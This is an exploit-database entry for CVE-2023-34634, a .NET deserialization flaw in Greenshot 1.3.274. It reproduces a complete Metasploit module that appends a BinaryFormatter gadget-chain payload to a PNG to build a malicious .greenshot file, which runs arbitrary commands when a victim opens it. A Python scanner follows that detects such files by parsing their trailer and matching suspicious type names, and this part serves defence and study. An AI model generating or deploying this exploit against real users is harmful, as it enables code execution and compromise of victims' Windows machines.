1337DAY-ID-38976 (Metasploit)
History: Aug 17, 2023 - 12:00 a.m.

Greenshot 1.3.274 Deserialization / Command Execution Exploit

2023-08-17 00:00:00
Source: metasploit (0day.today)
225
Tags: metasploit, greenshot, .net, deserialization, command execution, vulnerability, windows, cve, edb, png file, binary formatter

CVSS3: 7.8
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score: 8
Confidence: High
EPSS: 0.923
Percentile: 99.0%

There exists a .NET deserialization vulnerability in Greenshot versions 1.3.274 and below. Deserializing the contents of a .greenshot file allows command execution when a user opens the file. The commands execute with the same permissions as the Greenshot service, which is typically the logged-in user.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',
        'Description' => %q{
          There exists a .NET deserialization vulnerability in Greenshot version 1.3.274
          and below.  The deserialization allows the execution of commands when a user opens
          a Greenshot file.  The commands execute under the same permissions as the Greenshot
          service.  Typically, it is the logged in user.
        },
        'DisclosureDate' => '2023-07-26',
        'Author' => [
          'p4r4bellum',  # Discovery
          'bwatters-r7', # msf exploit
        ],
        'References' => [
          ['CVE', '2023-34634'],
          ['EDB', '51633']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Windows', {} ],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptPath.new('PNG_FILE', [false, 'PNG file to use'])
    ])
  end

  def exploit
    if datastore['PNG_FILE'].blank?
      image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
    else
      image_file = datastore['PNG_FILE']
    end

    datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?
    # Make sure the output file carries the .greenshot extension that Greenshot opens.
    # (Ruby's str[-10, -1] returns nil for a negative length, so the original suffix
    # comparison always appended the extension; end_with? tests the suffix as intended.)
    datastore['FILENAME'] << '.greenshot' unless datastore['FILENAME'].end_with?('.greenshot')
    cmd = payload.encoded

    image_data = File.binread(image_file)

    deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    )

    payload_length = deserialize_cmd.length
    outfile = image_data
    outfile << deserialize_cmd
    outfile << [payload_length].pack('Q')
    outfile << 'Greenshot01.02'
    file_create(outfile)
  end
end
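The module above documents the .greenshot layout it produces: the PNG image, then the BinaryFormatter stream, then that stream's 8-byte little-endian length, then the `Greenshot01.02` marker. That layout can be walked in reverse to triage a file before anyone opens it. The following is an added example, not part of the 0day.today listing or the Metasploit module; the suspicious-type watch-list and the fake PNG sample are assumptions constructed for the demonstration.

```python
import struct

# Trailer layout as the module writes it: <png><blob><uint64 LE blob length><marker>
TRAILER_MAGIC = b"Greenshot01.02"
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# A BinaryFormatter stream opens with a SerializationHeaderRecord:
# record type 0x00, RootId, HeaderId, MajorVersion=1, MinorVersion=0 (int32 LE each)
BF_VERSION_TAIL = struct.pack("<ii", 1, 0)

# Assumed watch-list: type names that have no place in a Greenshot drawing surface.
# WindowsIdentity is the gadget chain the module selects.
SUSPICIOUS_TYPES = (
    b"System.Security.Principal.WindowsIdentity",
    b"System.DelegateSerializationHolder",
)

def split_greenshot(data: bytes):
    """Return (png_bytes, serialized_blob); raise ValueError if the trailer is malformed."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("no PNG signature at start of file")
    if not data.endswith(TRAILER_MAGIC):
        raise ValueError("missing Greenshot01.02 trailer")
    body = data[: -len(TRAILER_MAGIC)]
    if len(body) < 8:
        raise ValueError("file too short for length field")
    (blob_len,) = struct.unpack("<Q", body[-8:])
    body = body[:-8]
    if blob_len == 0 or blob_len > len(body):
        raise ValueError("declared blob length is out of range")
    cut = len(body) - blob_len
    return body[:cut], body[cut:]

def is_binaryformatter(blob: bytes) -> bool:
    """True when the blob starts with a BinaryFormatter SerializationHeaderRecord."""
    return len(blob) >= 17 and blob[0] == 0x00 and blob[9:17] == BF_VERSION_TAIL

def scan_greenshot(data: bytes) -> list:
    """List watch-listed type names referenced by the file's serialized stream."""
    _png, blob = split_greenshot(data)
    if not is_binaryformatter(blob):
        return []
    return [name.decode() for name in SUSPICIOUS_TYPES if name in blob]

def build_sample(type_name: bytes) -> bytes:
    """Constructed test input: fake PNG prefix + header-only stream naming type_name."""
    blob = b"\x00" + struct.pack("<ii", 1, -1) + BF_VERSION_TAIL + type_name
    return PNG_SIGNATURE + b"\x00" * 16 + blob + struct.pack("<Q", len(blob)) + TRAILER_MAGIC
```

Greenshot stores its own drawing elements in that stream, so a BinaryFormatter header alone is expected; the signal is a type name that does not belong there.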
